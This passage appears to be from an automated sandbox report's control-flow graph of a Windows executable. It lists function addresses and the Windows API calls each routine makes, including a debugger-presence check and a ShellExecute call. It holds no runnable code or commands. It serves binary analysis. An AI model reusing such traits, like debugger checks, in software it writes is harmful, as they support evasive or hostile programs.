calls 99422->99426 99424 7ff7c0e5591f 99423->99424 99556 7ff7c0e55ab4 99424->99556 99428 7ff7c0e9c12b 99426->99428 99430 7ff7c0e55ab4 4 API calls 99428->99430 99432 7ff7c0e9c139 99430->99432 99431 7ff7c0e55941 99431->99416 99433 7ff7c0e55949 99431->99433 99435 7ff7c0e5e0a8 4 API calls 99432->99435 99434 7ff7c0e78e28 wcsftime 37 API calls 99433->99434 99436 7ff7c0e55958 99434->99436 99437 7ff7c0e9c14a 99435->99437 99436->99419 99439 7ff7c0e55960 99436->99439 99438 7ff7c0e55ab4 4 API calls 99437->99438 99440 7ff7c0e9c15b 99438->99440 99441 7ff7c0e78e28 wcsftime 37 API calls 99439->99441 99444 7ff7c0e5e0a8 4 API calls 99440->99444 99442 7ff7c0e5596f 99441->99442 99442->99422 99443 7ff7c0e55977 99442->99443 99445 7ff7c0e78e28 wcsftime 37 API calls 99443->99445 99446 7ff7c0e9c172 99444->99446 99448 7ff7c0e55986 99445->99448 99447 7ff7c0e55ab4 4 API calls 99446->99447 99450 7ff7c0e9c183 99447->99450 99449 7ff7c0e559c6 99448->99449 99451 7ff7c0e55ab4 4 API calls 99448->99451 99449->99440 99452 7ff7c0e559d3 99449->99452 99453 7ff7c0e559a8 99451->99453 99579 7ff7c0e5df90 99452->99579 99454 7ff7c0e5e0a8 4 API calls 99453->99454 99456 7ff7c0e559b5 99454->99456 99458 7ff7c0e55ab4 4 API calls 99456->99458 99458->99449 99460 7ff7c0e5d670 5 API calls 99461 7ff7c0e55a12 99460->99461 99461->99460 99462 7ff7c0e55ab4 4 API calls 99461->99462 99463 7ff7c0e55a60 Concurrency::wait 99461->99463 99462->99461 99463->99346 99465 7ff7c0e53f29 wcsftime 99464->99465 99466 7ff7c0e53f4b 99465->99466 99467 7ff7c0e9ba2c __scrt_fastfail 99465->99467 99468 7ff7c0e556d4 5 API calls 99466->99468 99469 7ff7c0e9ba4d GetOpenFileNameW 99467->99469 99470 7ff7c0e53f56 99468->99470 99471 7ff7c0e9bab0 99469->99471 99472 7ff7c0e53858 99469->99472 99952 7ff7c0e53eb4 99470->99952 99474 7ff7c0e57cf4 4 API calls 99471->99474 99472->99354 99472->99357 99476 7ff7c0e9babc 99474->99476 99478 7ff7c0e53f6c 99970 7ff7c0e56394 99478->99970 99481 7ff7c0e53fb6 wcsftime 99480->99481 100013 7ff7c0e59734 99481->100013 99483 7ff7c0e53fc4 99495 7ff7c0e54050 99483->99495 100023 7ff7c0e54d28 77 API calls 99483->100023 99485 7ff7c0e53fd3 99485->99495 100024 7ff7c0e54b0c 79 API calls Concurrency::wait 99485->100024 99487 7ff7c0e53fe0 99488 7ff7c0e53fe8 GetFullPathNameW 99487->99488 99487->99495 99489 7ff7c0e57cf4 4 API calls 99488->99489 99490 7ff7c0e54014 99489->99490 99491 7ff7c0e57cf4 4 API calls 99490->99491 99492 7ff7c0e54028 99491->99492 99493 7ff7c0e9bac2 wcscat 99492->99493 99494 7ff7c0e57cf4 4 API calls 99492->99494 99494->99495 99495->99357 100028 7ff7c0e53d90 7 API calls 99496->100028 99498 7ff7c0e538d5 99499 7ff7c0e53cbc CreateWindowExW CreateWindowExW ShowWindow ShowWindow 99498->99499 99500->99357 99501->99364 99502->99377 99504 7ff7c0e59be5 wcsftime 99503->99504 99505 7ff7c0e57cf4 4 API calls 99504->99505 99506 7ff7c0e59c1b 99504->99506 99505->99506 99515 7ff7c0e59c4a Concurrency::wait 99506->99515 99614 7ff7c0e59d84 99506->99614 99508 7ff7c0e5ec00 4 API calls 99509 7ff7c0e59d4a 99508->99509 99512 7ff7c0e54680 4 API calls 99509->99512 99510 7ff7c0e5ec00 4 API calls 99510->99515 99511 7ff7c0e59d84 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99511->99515 99513 7ff7c0e59d57 Concurrency::wait 99512->99513 99513->99394 99514 7ff7c0e54680 4 API calls 99514->99515 99515->99510 99515->99511 99515->99514 99516 7ff7c0e59d21 99515->99516 99516->99508 99516->99513 99617 7ff7c0e56d64 99517->99617 99520 7ff7c0e5649d 99522 7ff7c0e564ba FreeLibrary 99520->99522 99523 7ff7c0e564c0 99520->99523 99521 7ff7c0e56d64 2 API calls 99521->99520 99522->99523 99621 7ff7c0e848e0 99523->99621 99526 7ff7c0e564db LoadLibraryExW 99640 7ff7c0e56cc4 99526->99640 99527 7ff7c0e9c8f6 99529 7ff7c0e5652c 63 API calls 99527->99529 99531 7ff7c0e9c8fe 99529->99531 99533 7ff7c0e56cc4 3 API calls 99531->99533 99535 7ff7c0e9c907 99533->99535 99534 7ff7c0e56505 99534->99535 99536 7ff7c0e56512 99534->99536 99662 7ff7c0e567d8 99535->99662 99537 7ff7c0e5652c 63 API calls 99536->99537 99539 7ff7c0e55846 99537->99539 99539->99401 99539->99402 99542 7ff7c0e9c93f 99865 7ff7c0e61a30 99543->99865 99545 7ff7c0e5f029 99546 7ff7c0eaa7a8 99545->99546 99547 7ff7c0e5f040 99545->99547 99881 7ff7c0e5ee20 5 API calls Concurrency::wait 99546->99881 99550 7ff7c0e74c68 4 API calls 99547->99550 99549 7ff7c0eaa7bc 99551 7ff7c0e5f066 99550->99551 99553 7ff7c0e5f08f 99551->99553 99880 7ff7c0e5f0ec RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99551->99880 99876 7ff7c0e5f1bc 99553->99876 99555 7ff7c0e5f0c6 99555->99413 99557 7ff7c0e55ae4 99556->99557 99558 7ff7c0e55ac6 99556->99558 99560 7ff7c0e57cf4 4 API calls 99557->99560 99559 7ff7c0e5e0a8 4 API calls 99558->99559 99561 7ff7c0e5592d 99559->99561 99560->99561 99562 7ff7c0e78e28 99561->99562 99563 7ff7c0e78ea4 99562->99563 99564 7ff7c0e78e3f 99562->99564 99885 7ff7c0e78d98 35 API calls _mbstowcs_s_l 99563->99885 99574 7ff7c0e78e63 99564->99574 99883 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99564->99883 99567 7ff7c0e78ed6 99569 7ff7c0e78ee2 99567->99569 99571 7ff7c0e78ef9 99567->99571 99568 7ff7c0e78e49 99884 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99568->99884 99886 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99569->99886 99577 7ff7c0e82c80 37 API calls wcsftime 99571->99577 99578 7ff7c0e78ef2 99571->99578 99573 7ff7c0e78e54 99573->99431 99574->99431 99575 7ff7c0e78ee7 99887 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99575->99887 99577->99571 99578->99431 99581 7ff7c0e5dfac 99579->99581 99580 7ff7c0e74c68 4 API calls 99582 7ff7c0e559f5 99580->99582 99581->99580 99581->99582 99583 7ff7c0e5d670 99582->99583 99584 7ff7c0e5d698 99583->99584 99585 7ff7c0e5d6a2 99584->99585 99888 7ff7c0e5880c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99584->99888 99589 7ff7c0e5d7de 99585->99589 99889 7ff7c0e5ee20 5 API calls Concurrency::wait 99585->99889 99588 7ff7c0ea9d43 99589->99461 99591 7ff7c0ed29c8 99590->99591 99890 7ff7c0ed2b70 99591->99890 99594 7ff7c0ed29de 99594->99404 99595 7ff7c0e567d8 45 API calls 99596 7ff7c0ed2a03 99595->99596 99597 7ff7c0e567d8 45 API calls 99596->99597 99598 7ff7c0ed2a23 99597->99598 99599 7ff7c0e567d8 45 API calls 99598->99599 99600 7ff7c0ed2a49 99599->99600 99601 7ff7c0e567d8 45 API calls 99600->99601 99602 7ff7c0ed2a6d 99601->99602 99603 7ff7c0e567d8 45 API calls 99602->99603 99604 7ff7c0ed2ac5 99603->99604 99605 7ff7c0ed240c 32 API calls 99604->99605 99606 7ff7c0ed2ada 99605->99606 99606->99594 99895 7ff7c0ed1d48 99606->99895 99609 7ff7c0e5653d 99608->99609 99611 7ff7c0e56542 99608->99611 99610 7ff7c0e84970 62 API calls 99609->99610 99610->99611 99612 7ff7c0e56558 99611->99612 99613 7ff7c0e5656f FreeLibrary 99611->99613 99612->99416 99613->99612 99615 7ff7c0e5a7c0 4 API calls 99614->99615 99616 7ff7c0e59d99 99615->99616 99616->99506 99618 7ff7c0e56490 99617->99618 99619 7ff7c0e56d74 LoadLibraryA 99617->99619 99618->99520 99618->99521 99619->99618 99620 7ff7c0e56d89 GetProcAddress 99619->99620 99620->99618 99622 7ff7c0e847fc 99621->99622 99623 7ff7c0e8482a 99622->99623 99625 7ff7c0e8485c 99622->99625 99682 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99623->99682 99627 7ff7c0e84862 99625->99627 99628 7ff7c0e8486f 99625->99628 99626 7ff7c0e8482f 99683 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99626->99683 99684 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99627->99684 99670 7ff7c0e8feb4 99628->99670 99632 7ff7c0e564cf 99632->99526 99632->99527 99634 7ff7c0e84883 99685 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99634->99685 99635 7ff7c0e84890 99677 7ff7c0e90304 99635->99677 99639 7ff7c0e848a3 99686 7ff7c0e7df60 LeaveCriticalSection 99639->99686 99824 7ff7c0e56d1c 99640->99824 99643 7ff7c0e56cf1 99645 7ff7c0e564f7 99643->99645 99646 7ff7c0e56d0f FreeLibrary 99643->99646 99644 7ff7c0e56d1c 2 API calls 99644->99643 99647 7ff7c0e56580 99645->99647 99646->99645 99648 7ff7c0e74c68 4 API calls 99647->99648 99649 7ff7c0e565b5 memcpy_s 99648->99649 99650 7ff7c0e9c9f5 99649->99650 99651 7ff7c0e56740 CreateStreamOnHGlobal 99649->99651 99661 7ff7c0e56602 99649->99661 99828 7ff7c0ed2e00 45 API calls 99650->99828 99653 7ff7c0e56759 FindResourceExW 99651->99653 99651->99661 99653->99661 99654 7ff7c0e9c97e LoadResource 99656 7ff7c0e9c997 SizeofResource 99654->99656 99654->99661 99655 7ff7c0e567d8 45 API calls 99655->99661 99658 7ff7c0e9c9ae LockResource 99656->99658 99656->99661 99657 7ff7c0e9c9fd 99659 7ff7c0e567d8 45 API calls 99657->99659 99658->99661 99660 7ff7c0e566e8 99659->99660 99660->99534 99661->99654 99661->99655 99661->99657 99661->99660 99663 7ff7c0e567f7 99662->99663 99664 7ff7c0e9ca6c 99662->99664 99829 7ff7c0e84c5c 99663->99829 99667 7ff7c0ed240c 99848 7ff7c0ed2200 99667->99848 99669 7ff7c0ed2430 99669->99542 99687 7ff7c0e8b9bc EnterCriticalSection 99670->99687 99672 7ff7c0e8fecb 99673 7ff7c0e8ff54 18 API calls 99672->99673 99674 7ff7c0e8fed6 99673->99674 99675 7ff7c0e8ba10 _isindst LeaveCriticalSection 99674->99675 99676 7ff7c0e84879 99675->99676 99676->99634 99676->99635 99688 7ff7c0e90040 99677->99688 99680 7ff7c0e9035e 99680->99639 99682->99626 99683->99632 99684->99632 99685->99632 99693 7ff7c0e9007d try_get_function 99688->99693 99690 7ff7c0e902de 99707 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99690->99707 99692 7ff7c0e9021a 99692->99680 99700 7ff7c0e97738 99692->99700 99696 7ff7c0e90211 99693->99696 99703 7ff7c0e7db68 37 API calls 4 library calls 99693->99703 99695 7ff7c0e90277 99695->99696 99704 7ff7c0e7db68 37 API calls 4 library calls 99695->99704 99696->99692 99706 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99696->99706 99698 7ff7c0e9029a 99698->99696 99705 7ff7c0e7db68 37 API calls 4 library calls 99698->99705 99708 7ff7c0e96d04 99700->99708 99703->99695 99704->99698 99705->99696 99706->99690 99707->99692 99709 7ff7c0e96d40 99708->99709 99710 7ff7c0e96d28 99708->99710 99709->99710 99713 7ff7c0e96d6d 99709->99713 99762 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99710->99762 99712 7ff7c0e96d2d 99763 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99712->99763 99719 7ff7c0e97348 99713->99719 99716 7ff7c0e96d39 99716->99680 99765 7ff7c0e97078 99719->99765 99722 7ff7c0e973d3 99785 7ff7c0e8e418 99722->99785 99723 7ff7c0e973bc 99797 7ff7c0e855b4 15 API calls _invalid_parameter_noinfo 99723->99797 99726 7ff7c0e973c1 99798 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99726->99798 99728 7ff7c0e973df 99799 7ff7c0e855b4 15 API calls _invalid_parameter_noinfo 99728->99799 99729 7ff7c0e973f7 CreateFileW 99732 7ff7c0e97469 99729->99732 99733 7ff7c0e974eb GetFileType 99729->99733 99734 7ff7c0e974b8 GetLastError 99732->99734 99738 7ff7c0e97478 CreateFileW 99732->99738 99735 7ff7c0e974f8 GetLastError 99733->99735 99736 7ff7c0e97549 99733->99736 99801 7ff7c0e85564 15 API calls 2 library calls 99734->99801 99802 7ff7c0e85564 15 API calls 2 library calls 99735->99802 99804 7ff7c0e8e334 16 API calls 2 library calls 99736->99804 99737 7ff7c0e973e4 99800 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99737->99800 99738->99733 99738->99734 99742 7ff7c0e97507 CloseHandle 99742->99726 99744 7ff7c0e97539 99742->99744 99803 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99744->99803 99745 7ff7c0e97568 99747 7ff7c0e975b5 99745->99747 99805 7ff7c0e97284 67 API calls 2 library calls 99745->99805 99752 7ff7c0e975ec 99747->99752 99806 7ff7c0e96de4 67 API calls 4 library calls 99747->99806 99748 7ff7c0e9753e 99748->99726 99751 7ff7c0e975e8 99751->99752 99753 7ff7c0e975fe 99751->99753 99807 7ff7c0e904b8 99752->99807 99755 7ff7c0e96d95 99753->99755 99756 7ff7c0e97681 CloseHandle CreateFileW 99753->99756 99755->99716 99764 7ff7c0e8e3f4 LeaveCriticalSection 99755->99764 99757 7ff7c0e976cb GetLastError 99756->99757 99758 7ff7c0e976f9 99756->99758 99822 7ff7c0e85564 15 API calls 2 library calls 99757->99822 99758->99755 99760 7ff7c0e976d8 99823 7ff7c0e8e548 16 API calls 2 library calls 99760->99823 99762->99712 99763->99716 99766 7ff7c0e970a4 99765->99766 99774 7ff7c0e970be 99765->99774 99767 7ff7c0e855d4 _set_errno_from_matherr 15 API calls 99766->99767 99766->99774 99768 7ff7c0e970b3 99767->99768 99769 7ff7c0e8b164 _invalid_parameter_noinfo 31 API calls 99768->99769 99769->99774 99770 7ff7c0e9718c 99772 7ff7c0e82554 31 API calls 99770->99772 99781 7ff7c0e971ec 99770->99781 99771 7ff7c0e9713b 99771->99770 99773 7ff7c0e855d4 _set_errno_from_matherr 15 API calls 99771->99773 99775 7ff7c0e971e8 99772->99775 99776 7ff7c0e97181 99773->99776 99774->99771 99777 7ff7c0e855d4 _set_errno_from_matherr 15 API calls 99774->99777 99778 7ff7c0e9726b 99775->99778 99775->99781 99779 7ff7c0e8b164 _invalid_parameter_noinfo 31 API calls 99776->99779 99780 7ff7c0e97130 99777->99780 99782 7ff7c0e8b184 _invalid_parameter_noinfo 16 API calls 99778->99782 99779->99770 99783 7ff7c0e8b164 _invalid_parameter_noinfo 31 API calls 99780->99783 99781->99722 99781->99723 99784 7ff7c0e97280 99782->99784 99783->99771 99786 7ff7c0e8b9bc _isindst EnterCriticalSection 99785->99786 99792 7ff7c0e8e43b 99786->99792 99787 7ff7c0e8ba10 _isindst LeaveCriticalSection 99789 7ff7c0e8e52a 99787->99789 99788 7ff7c0e8e464 99790 7ff7c0e8e170 16 API calls 99788->99790 99789->99728 99789->99729 99791 7ff7c0e8e469 99790->99791 99794 7ff7c0e8e310 wprintf EnterCriticalSection 99791->99794 99796 7ff7c0e8e487 99791->99796 99792->99788 99793 7ff7c0e8e4c2 EnterCriticalSection 99792->99793 99792->99796 99795 7ff7c0e8e4d1 LeaveCriticalSection 99793->99795 99793->99796 99794->99796 99795->99792 99796->99787 99797->99726 99798->99755 99799->99737 99800->99726 99801->99726 99802->99742 99803->99748 99804->99745 99805->99747 99806->99751 99808 7ff7c0e8e604 31 API calls 99807->99808 99811 7ff7c0e904cc 99808->99811 99809 7ff7c0e904d2 99810 7ff7c0e8e548 16 API calls 99809->99810 99815 7ff7c0e90534 99810->99815 99811->99809 99812 7ff7c0e8e604 31 API calls 99811->99812 99821 7ff7c0e9050c 99811->99821 99816 7ff7c0e904ff 99812->99816 99813 7ff7c0e8e604 31 API calls 99817 7ff7c0e90518 CloseHandle 99813->99817 99814 7ff7c0e90560 99814->99755 99815->99814 99819 7ff7c0e85564 fread_s 15 API calls 99815->99819 99820 7ff7c0e8e604 31 API calls 99816->99820 99817->99809 99818 7ff7c0e90525 GetLastError 99817->99818 99818->99809 99819->99814 99820->99821 99821->99809 99821->99813 99822->99760 99823->99758 99825 7ff7c0e56d2c LoadLibraryA 99824->99825 99826 7ff7c0e56ce3 99824->99826 99825->99826 99827 7ff7c0e56d41 GetProcAddress 99825->99827 99826->99643 99826->99644 99827->99826 99828->99657 99832 7ff7c0e84c7c 99829->99832 99833 7ff7c0e84ca6 99832->99833 99844 7ff7c0e5680a 99832->99844 99834 7ff7c0e84cd7 99833->99834 99835 7ff7c0e84cb5 __scrt_fastfail 99833->99835 99833->99844 99847 7ff7c0e7df54 EnterCriticalSection 99834->99847 99845 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99835->99845 99839 7ff7c0e84cca 99846 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99839->99846 99844->99667 99845->99839 99846->99844 99851 7ff7c0e847bc 99848->99851 99850 7ff7c0ed2210 99850->99669 99854 7ff7c0e84724 99851->99854 99855 7ff7c0e84746 99854->99855 99856 7ff7c0e84732 99854->99856 99857 7ff7c0e84742 99855->99857 99864 7ff7c0e8bef8 6 API calls __vcrt_uninitialize_ptd 99855->99864 99862 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99856->99862 99857->99850 99860 7ff7c0e84737 99863 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99860->99863 99862->99860 99863->99857 99864->99857 99866 7ff7c0e61a48 99865->99866 99867 7ff7c0e61c5f 99865->99867 99871 7ff7c0e61a90 99866->99871 99882 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 99866->99882 99867->99545 99871->99545 99877 7ff7c0e5f1ce 99876->99877 99879 7ff7c0e5f1d8 99876->99879 99878 7ff7c0e61a30 45 API calls 99877->99878 99878->99879 99879->99555 99880->99553 99881->99549 99883->99568 99884->99573 99885->99567 99886->99575 99887->99578 99888->99585 99889->99588 99894 7ff7c0ed2bae 99890->99894 99891 7ff7c0e567d8 45 API calls 99891->99894 99892 7ff7c0ed240c 32 API calls 99892->99894 99893 7ff7c0ed29da 99893->99594 99893->99595 99894->99891 99894->99892 99894->99893 99896 7ff7c0ed1d61 99895->99896 99897 7ff7c0ed1d71 99895->99897 99898 7ff7c0e848e0 89 API calls 99896->99898 99899 7ff7c0ed1dbf 99897->99899 99900 7ff7c0e848e0 89 API calls 99897->99900 99915 7ff7c0ed1d7a 99897->99915 99898->99897 99922 7ff7c0ed2038 99899->99922 99902 7ff7c0ed1d9e 99900->99902 99902->99899 99904 7ff7c0ed1da7 99902->99904 99903 7ff7c0ed1df5 99905 7ff7c0ed1e1c 99903->99905 99906 7ff7c0ed1df9 99903->99906 99904->99915 99934 7ff7c0e84970 99904->99934 99911 7ff7c0ed1e4a 99905->99911 99912 7ff7c0ed1e2a 99905->99912 99907 7ff7c0ed1e07 99906->99907 99909 7ff7c0e84970 62 API calls 99906->99909 99910 7ff7c0e84970 62 API calls 99907->99910 99907->99915 99909->99907 99910->99915 99926 7ff7c0ed1e88 99911->99926 99914 7ff7c0ed1e38 99912->99914 99916 7ff7c0e84970 62 API calls 99912->99916 99914->99915 99917 7ff7c0e84970 62 API calls 99914->99917 99915->99594 99916->99914 99917->99915 99918 7ff7c0ed1e52 99919 7ff7c0ed1e68 99918->99919 99920 7ff7c0e84970 62 API calls 99918->99920 99919->99915 99921 7ff7c0e84970 62 API calls 99919->99921 99920->99919 99921->99915 99923 7ff7c0ed2056 memcpy_s 99922->99923 99924 7ff7c0ed2069 99922->99924 99923->99903 99925 7ff7c0e84c5c _fread_nolock 45 API calls 99924->99925 99925->99923 99927 7ff7c0ed1fb0 99926->99927 99932 7ff7c0ed1eaa 99926->99932 99930 7ff7c0ed1fd3 99927->99930 99948 7ff7c0e82a04 60 API calls 2 library calls 99927->99948 99928 7ff7c0ed1bd0 45 API calls 99928->99932 99930->99918 99932->99927 99932->99928 99932->99930 99932->99932 99946 7ff7c0ed1c9c 45 API calls 99932->99946 99947 7ff7c0ed20cc 60 API calls 99932->99947 99935 7ff7c0e8498e 99934->99935 99936 7ff7c0e849a3 99934->99936 99950 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 99935->99950 99938 7ff7c0e8499e 99936->99938 99949 7ff7c0e7df54 EnterCriticalSection 99936->99949 99938->99915 99939 7ff7c0e84993 99951 7ff7c0e8b164 31 API calls _invalid_parameter_noinfo 99939->99951 99941 7ff7c0e849b9 99943 7ff7c0e848ec 60 API calls 99941->99943 99944 7ff7c0e849c2 99943->99944 99945 7ff7c0e7df60 fflush LeaveCriticalSection 99944->99945 99945->99938 99946->99932 99947->99932 99948->99930 99950->99939 99951->99938 99953 7ff7c0e98f90 wcsftime 99952->99953 99954 7ff7c0e53ec4 GetLongPathNameW 99953->99954 99955 7ff7c0e57cf4 4 API calls 99954->99955 99956 7ff7c0e53eed 99955->99956 99957 7ff7c0e54074 99956->99957 99958 7ff7c0e59640 4 API calls 99957->99958 99959 7ff7c0e5408e 99958->99959 99960 7ff7c0e556d4 5 API calls 99959->99960 99961 7ff7c0e5409b 99960->99961 99962 7ff7c0e540a7 99961->99962 99967 7ff7c0e9bada 99961->99967 99964 7ff7c0e54680 4 API calls 99962->99964 99965 7ff7c0e540b5 99964->99965 100000 7ff7c0e540e8 99965->100000 99966 7ff7c0e9bb0f 99967->99966 100004 7ff7c0e71ad0 CompareStringW 99967->100004 99969 7ff7c0e540cb Concurrency::wait 99969->99478 99971 7ff7c0e56460 105 API calls 99970->99971 99972 7ff7c0e563e5 99971->99972 99973 7ff7c0e9c656 99972->99973 99975 7ff7c0e56460 105 API calls 99972->99975 99974 7ff7c0ed2948 90 API calls 99973->99974 99976 7ff7c0e9c66e 99974->99976 99977 7ff7c0e56400 99975->99977 99978 7ff7c0e9c690 99976->99978 99979 7ff7c0e9c672 99976->99979 99977->99973 99980 7ff7c0e56408 99977->99980 99982 7ff7c0e74c68 4 API calls 99978->99982 99981 7ff7c0e5652c 63 API calls 99979->99981 99983 7ff7c0e56414 99980->99983 99984 7ff7c0e9c67b 99980->99984 99981->99984 99999 7ff7c0e9c6dd Concurrency::wait 99982->99999 100005 7ff7c0e5e774 143 API calls Concurrency::wait 99983->100005 100006 7ff7c0ecc5c8 77 API calls wprintf 99984->100006 99987 7ff7c0e56438 99987->99472 99988 7ff7c0e9c68a 99988->99978 99989 7ff7c0e9c895 99990 7ff7c0e5652c 63 API calls 99989->99990 99998 7ff7c0e9c8a9 99990->99998 99995 7ff7c0e5ec00 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99995->99999 99998->99989 100012 7ff7c0ec76d8 77 API calls 3 library calls 99998->100012 99999->99989 99999->99995 99999->99998 100007 7ff7c0ec7400 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99999->100007 100008 7ff7c0ec730c 39 API calls 99999->100008 100009 7ff7c0ed0210 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99999->100009 100010 7ff7c0e5b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 99999->100010 100011 7ff7c0e59940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 99999->100011 100001 7ff7c0e54107 100000->100001 100003 7ff7c0e54130 memcpy_s 100000->100003 100002 7ff7c0e74c68 4 API calls 100001->100002 100002->100003 100003->99969 100004->99967 100005->99987 100006->99988 100007->99999 100008->99999 100009->99999 100010->99999 100011->99999 100012->99998 100014 7ff7c0e5988d 100013->100014 100015 7ff7c0e59762 100013->100015 100014->99483 100015->100014 100016 7ff7c0e74c68 4 API calls 100015->100016 100018 7ff7c0e59791 100016->100018 100017 7ff7c0e74c68 4 API calls 100021 7ff7c0e5981c 100017->100021 100018->100017 100021->100014 100025 7ff7c0e5abe0 81 API calls 2 library calls 100021->100025 100026 7ff7c0e59940 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100021->100026 100027 7ff7c0e5b26c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection memcpy_s 100021->100027 100023->99485 100024->99487 100025->100021 100026->100021 100027->100021 100028->99498 100029 7ff7c0e8c51c 100030 7ff7c0e8c567 100029->100030 100034 7ff7c0e8c52b _invalid_parameter_noinfo 100029->100034 100037 7ff7c0e855d4 15 API calls _invalid_parameter_noinfo 100030->100037 100032 7ff7c0e8c54e HeapAlloc 100033 7ff7c0e8c565 100032->100033 100032->100034 100034->100030 100034->100032 100036 7ff7c0e7925c EnterCriticalSection LeaveCriticalSection _invalid_parameter_noinfo 100034->100036 100036->100034 100037->100033 100038 7ff7c0e790e0 100045 7ff7c0e8af30 100038->100045 100040 7ff7c0e790e5 100041 7ff7c0e8ba10 _isindst LeaveCriticalSection 100040->100041 100042 7ff7c0e790f0 100041->100042 100043 7ff7c0e790fc 100042->100043 100044 7ff7c0e79118 11 API calls 100042->100044 100044->100043 100050 7ff7c0e8b778 35 API calls 3 library calls 100045->100050 100047 7ff7c0e8af3b 100051 7ff7c0e8b26c 35 API calls abort 100047->100051 100050->100047 100052 7ff7c0e647e1 100053 7ff7c0e64d57 100052->100053 100057 7ff7c0e647f2 100052->100057 100083 7ff7c0e5ee20 5 API calls Concurrency::wait 100053->100083 100055 7ff7c0e64d66 100084 7ff7c0e5ee20 5 API calls Concurrency::wait 100055->100084 100057->100055 100058 7ff7c0e64862 100057->100058 100059 7ff7c0e64df3 100057->100059 100061 7ff7c0e666c0 300 API calls 100058->100061 100080 7ff7c0e63c80 100058->100080 100085 7ff7c0ed0978 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100059->100085 100061->100080 100062 7ff7c0eb05be 100063 7ff7c0eb05d1 100062->100063 100087 7ff7c0ed34e4 77 API calls 3 library calls 100062->100087 100065 7ff7c0e64aa9 100067 7ff7c0e64ac0 100065->100067 100069 7ff7c0e5e0a8 4 API calls 100065->100069 100068 7ff7c0e64fe7 100071 7ff7c0e5e0a8 4 API calls 100068->100071 100075 7ff7c0e63dde 100069->100075 100070 7ff7c0eafefe 100074 7ff7c0e5e0a8 4 API calls 100070->100074 100071->100075 100072 7ff7c0e5e0a8 4 API calls 100072->100080 100073 7ff7c0e64a8f 100073->100065 100073->100067 100073->100070 100074->100067 100077 7ff7c0e75114 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 100077->100080 100078 7ff7c0e59640 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 100078->100080 100079 7ff7c0e750b4 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent _Init_thread_footer 100079->100080 100080->100062 100080->100065 100080->100068 100080->100072 100080->100073 100080->100075 100080->100077 100080->100078 100080->100079 100081 7ff7c0e74f0c 34 API calls __scrt_initialize_thread_safe_statics 100080->100081 100082 7ff7c0e65360 300 API calls Concurrency::wait 100080->100082 100086 7ff7c0ed34e4 77 API calls 3 library calls 100080->100086 100081->100080 100082->100080 100083->100055 100084->100059 100085->100080 100086->100080 100087->100063

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E537F2
                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53807
                                                                      • GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E5388D
                                                                        • Part of subcall function 00007FF7C0E53F9C: GetFullPathNameW.KERNEL32(D000000000000000,00007FF7C0E538BF,?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53FFD
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E53924
                                                                      • MessageBoxA.USER32 ref: 00007FF7C0E9B888
                                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E9B8E1
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,00007FF7C0E53785), ref: 00007FF7C0E9B968
                                                                      • ShellExecuteW.SHELL32 ref: 00007FF7C0E9B98F
                                                                        • Part of subcall function 00007FF7C0E53B84: GetSysColorBrush.USER32 ref: 00007FF7C0E53B9E
                                                                        • Part of subcall function 00007FF7C0E53B84: LoadCursorW.USER32 ref: 00007FF7C0E53BAE
                                                                        • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BC3
                                                                        • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BDC
                                                                        • Part of subcall function 00007FF7C0E53B84: LoadIconW.USER32 ref: 00007FF7C0E53BF5
                                                                        • Part of subcall function 00007FF7C0E53B84: LoadImageW.USER32 ref: 00007FF7C0E53C21
                                                                        • Part of subcall function 00007FF7C0E53B84: RegisterClassExW.USER32 ref: 00007FF7C0E53C85
                                                                        • Part of subcall function 00007FF7C0E53CBC: CreateWindowExW.USER32 ref: 00007FF7C0E53D0C
